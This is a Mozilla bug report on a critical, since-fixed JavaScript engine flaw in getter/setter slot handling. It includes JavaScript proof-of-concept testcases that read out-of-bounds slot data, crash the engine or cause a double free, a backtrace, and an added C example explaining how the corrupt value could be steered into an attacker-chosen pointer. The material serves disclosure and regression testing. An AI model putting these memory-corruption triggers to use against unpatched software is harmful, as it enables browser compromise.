Bug 367501 - getter/setter issue is not yet fixed on branches
Status: VERIFIED FIXED
Whiteboard: [sg:critical] fix in bug 366292
Keywords: verified1.8.0.10, verified1.8.1.2
Product: Core
Classification: Components
Component: JavaScript Engine
Version: Trunk
Platform: x86 Windows XP
Importance: -- normal
Target Milestone: ---
Assigned To: general
Depends on: 366292
Reported: 2007-01-19 07:53 PST by moz_bug_r_a4
Modified: 2007-08-08 08:08 PDT
Flags:
dveditz: blocking1.8.1.2+
dveditz: blocking1.8.0.10+
bob: in-testsuite+


Attachments
testcase (680 bytes, text/html), 2007-01-19 07:53 PST, moz_bug_r_a4
js1_5/extensions/regress-367501-01.js (2.35 KB, text/plain), 2007-02-06 20:17 PST, Bob Clary [:bc:]
js1_5/extensions/regress-367501-02.js (2.42 KB, text/plain), 2007-02-06 20:17 PST, Bob Clary [:bc:]
js1_5/extensions/regress-367501-03.js (2.41 KB, text/plain), 2007-02-06 20:18 PST, Bob Clary [:bc:]
js1_5/extensions/regress-367501-04.js (2.41 KB, text/plain), 2007-02-06 20:19 PST, Bob Clary [:bc:]

Description moz_bug_r_a4 2007-01-19 07:53:40 PST
Created attachment 252060
testcase

The patch in bug 366396 is not sufficient to fix this on branches.
CACHED_GET, CACHED_SET, NATIVE_GET, NATIVE_SET are related.

And, this could be potentially exploitable.

---
var a = { set x() {} };
a.x;

The resulting value is 2 (obj->slots[-1] == 5).

---
var a = { set x() {} };
for (var i = 0; i < 92169 - 3; ++i) a[i] = 1;
a.x;
a.x;

The resulting value is 46084 (obj->slots[-1] == 92169).

---
var a = { set x() {} };
for (var i = 0; i < 0x4bf20 - 3; ++i) a[i] = 1;
a.x;
a.x.x;

Crash (obj->slots[-1] == 0x4bf20).

---
var a = { set x() {} };
for (var i = 0; i < 0x10050c - 3; ++i) a[i] = 1;
a.x;
typeof a.x;

The resulting value is "string" (obj->slots[-1] == 0x10050c).

---
var a = { get y() {} };
a.y = 10;
for (var i = 0; i < 3; ++i) a[i] = 1;

*** glibc detected *** double free or corruption (out): 0x08a42d90 ***

#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb74d19a1 in raise () from /lib/tls/i686/cmov/libc.so.6
#2  0xb74d32b9 in abort () from /lib/tls/i686/cmov/libc.so.6
#3  0xb750587a in __fsetlocking () from /lib/tls/i686/cmov/libc.so.6
#4  0xb750bfd4 in malloc_usable_size () from /lib/tls/i686/cmov/libc.so.6
#5  0xb750c34a in free () from /lib/tls/i686/cmov/libc.so.6
#6  0xb7e6fe75 in JS_free (cx=0x885a1f0, p=0x8a42d90) at jsapi.c:1690
#7  0xb7ee9436 in AllocSlots (cx=0x885a1f0, slots=0x8a42d94, nslots=8)
    at jsobj.c:2280
#8  0xb7eeb140 in js_AllocSlot (cx=0x885a1f0, obj=0x8a80b30, slotp=0xbfa80e04)
    at jsobj.c:2733
#9  0xb7f26a7c in js_AddScopeProperty (cx=0x885a1f0, scope=0x8a29d38, id=5,
    getter=0, setter=0, slot=4294967295, attrs=1, flags=0, shortid=0)
    at jsscope.c:1134
#10 0xb7eee70a in js_SetProperty (cx=0x885a1f0, obj=0x8a80b30, id=5,
    vp=0xbfa815f0) at jsobj.c:3699
#11 0xb7eca7e2 in js_Interpret (cx=0x885a1f0, pc=0x88017ad "8\002)",
    result=0xbfa81990) at jsinterp.c:3737
#12 0xb7eb94f5 in js_Execute (cx=0x885a1f0, chain=0x8a80b48, script=0x8801740,
    down=0x81baff8, flags=32, result=0xbfa81b70) at jsinterp.c:1654
#13 0xb7ee5e07 in obj_eval (cx=0x885a1f0, obj=0x8a94418, argc=1,
    argv=0x81bb078, rval=0xbfa81b70) at jsobj.c:1360
#14 0xb7eb8927 in js_Invoke (cx=0x885a1f0, argc=1, flags=0) at jsinterp.c:1396
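The four results in the description (2, 46084, a crash, and "string") line up with the slot counts the reporter lists in parentheses once you treat obj->slots[-1] as if it were a jsval. The following is an added example, not SpiderMonkey code: it decodes a 32-bit word the way the 1.8-era jsval tagging did (assumed from the jsapi.h of that era: int if the low bit is set, otherwise the low three bits select object 0, double 2, string 4, boolean 6), and applies that to each slot count from the testcases. The function and type names are this example's own.

```c
#include <stdint.h>
#include <stdio.h>

/* Assumption: 32-bit jsval tag layout of the 1.8 branches (not the
 * project's header; constants reproduced here for the example). */
#define JSVAL_TAGMASK 0x7u
#define JSVAL_OBJECT  0x0u   /* untagged pointer to a JSObject */
#define JSVAL_INT     0x1u   /* low bit set: 31-bit integer in the upper bits */
#define JSVAL_DOUBLE  0x2u   /* pointer to a heap double */
#define JSVAL_STRING  0x4u   /* pointer to a JSString */
#define JSVAL_BOOLEAN 0x6u

typedef uint32_t jsval32;

enum jsval_kind { JSV_OBJECT, JSV_INT, JSV_DOUBLE, JSV_STRING, JSV_BOOLEAN, JSV_UNKNOWN };

/* Classify a raw 32-bit word the way the engine's JSVAL_IS_* macros would. */
enum jsval_kind jsval_kind(jsval32 v) {
    if (v & JSVAL_INT) return JSV_INT;          /* any odd word is an int */
    switch (v & JSVAL_TAGMASK) {
    case JSVAL_OBJECT:  return JSV_OBJECT;
    case JSVAL_DOUBLE:  return JSV_DOUBLE;
    case JSVAL_STRING:  return JSV_STRING;
    case JSVAL_BOOLEAN: return JSV_BOOLEAN;
    default:            return JSV_UNKNOWN;
    }
}

/* JSVAL_TO_INT: drop the tag bit, keep the sign. */
int32_t jsval_to_int(jsval32 v) { return (int32_t)v >> 1; }

/* Name that `typeof` would report for a value of this kind. */
const char *typeof_name(enum jsval_kind k) {
    switch (k) {
    case JSV_INT: case JSV_DOUBLE: return "number";
    case JSV_OBJECT:               return "object";
    case JSV_STRING:               return "string";
    case JSV_BOOLEAN:              return "boolean";
    default:                       return "?";
    }
}

/* What `a.x` yields when the engine hands back the slot-count word
 * obj->slots[-1] as a jsval. For ints, *out is the decoded integer; for
 * pointer-tagged kinds it is the address the engine would go on to use,
 * which is where `a.x.x` on a bogus object pointer crashes. */
enum jsval_kind observe_slot_count(uint32_t nslots, uint32_t *out) {
    enum jsval_kind k = jsval_kind(nslots);
    if (k == JSV_INT)
        *out = (uint32_t)jsval_to_int(nslots);
    else
        *out = nslots & ~JSVAL_TAGMASK;   /* tag stripped: the raw pointer */
    return k;
}

int main(void) {
    /* Slot counts taken from the four testcases in the description. */
    const uint32_t counts[] = { 5, 92169, 0x4bf20, 0x10050c };
    for (size_t i = 0; i < sizeof counts / sizeof counts[0]; i++) {
        uint32_t out;
        enum jsval_kind k = observe_slot_count(counts[i], &out);
        printf("slots[-1]=0x%x -> typeof \"%s\", %s 0x%x\n",
               counts[i], typeof_name(k),
               k == JSV_INT ? "int value" : "would dereference", out);
    }
    return 0;
}
```

The object case is the one that matters for exploitability: a slot count whose low three bits are zero is accepted as a JSObject pointer, so an attacker who can steer the slot count controls which address the engine dereferences.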
Comment 1 moz_bug_r_a4 2007-01-19 08:15:07 PST
SeaMonkey 1.1 has been released with this bug.

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070111 SeaMonkey/1.1
Comment 2 Blake Kaplan (:mrbkap) 2007-01-19 09:18:27 PST
Bug 366292 was never checked into the 1.8 branch...
Comment 3 Daniel Veditz [:dveditz] 2007-01-19 10:16:44 PST
Is this a duplicate of bug 366292 then, or is that just a prerequisite to fixing this?
Comment 4 Daniel Veditz [:dveditz] 2007-01-19 10:21:51 PST
(In reply to comment #1)
> SeaMonkey 1.1 has been released with this bug.

The seamonkey team decided to release the much delayed 1.1 now rather than wait for 1.8.1.2 and plan to catch up with a subsequent security update.
Comment 5 Jay Patel [:jay] 2007-01-22 15:15:01 PST
brendan:  Is this a dup of bug 366292?  If so, we need to mark it so and remove the blocking flags (since we already approved and landed the fixes in that other bug).  Let us know... thanks!
Comment 6 moz_bug_r_a4 2007-01-22 20:57:47 PST
This has been fixed in bug 366292.

Tested with:
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070122
BonEcho/2.0.0.2pre
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.10pre) Gecko/20070122
Firefox/1.5.0.10pre
Comment 7 Bob Clary [:bc:] 2007-02-06 20:17:04 PST
Created attachment 254253
js1_5/extensions/regress-367501-01.js
Comment 8 Bob Clary [:bc:] 2007-02-06 20:17:59 PST
Created attachment 254254
js1_5/extensions/regress-367501-02.js
Comment 9 Bob Clary [:bc:] 2007-02-06 20:18:38 PST
Created attachment 254255
js1_5/extensions/regress-367501-03.js
Comment 10 Bob Clary [:bc:] 2007-02-06 20:19:15 PST
Created attachment 254256
js1_5/extensions/regress-367501-04.js
Comment 11 Bob Clary [:bc:] 2007-02-09 07:52:10 PST
verified fixed 1.8.0.10, 1.8.1.2 2007-02-08 windows/mac*/linux
Comment 12 Bob Clary [:bc:] 2007-02-19 13:32:29 PST
verified fixed 2007-02-17 1.9.0 windows/mac*/linux
Comment 13 Bob Clary [:bc:] 2007-08-08 08:08:05 PDT
/cvsroot/mozilla/js/tests/js1_5/extensions/regress-367501-01.js,v  <--  regress-367501-01.js
initial revision: 1.1

/cvsroot/mozilla/js/tests/js1_5/extensions/regress-367501-02.js,v  <--  regress-367501-02.js
initial revision: 1.1

/cvsroot/mozilla/js/tests/js1_5/extensions/regress-367501-03.js,v  <--  regress-367501-03.js
initial revision: 1.1

/cvsroot/mozilla/js/tests/js1_5/extensions/regress-367501-04.js,v  <--  regress-367501-04.js
initial revision: 1.1
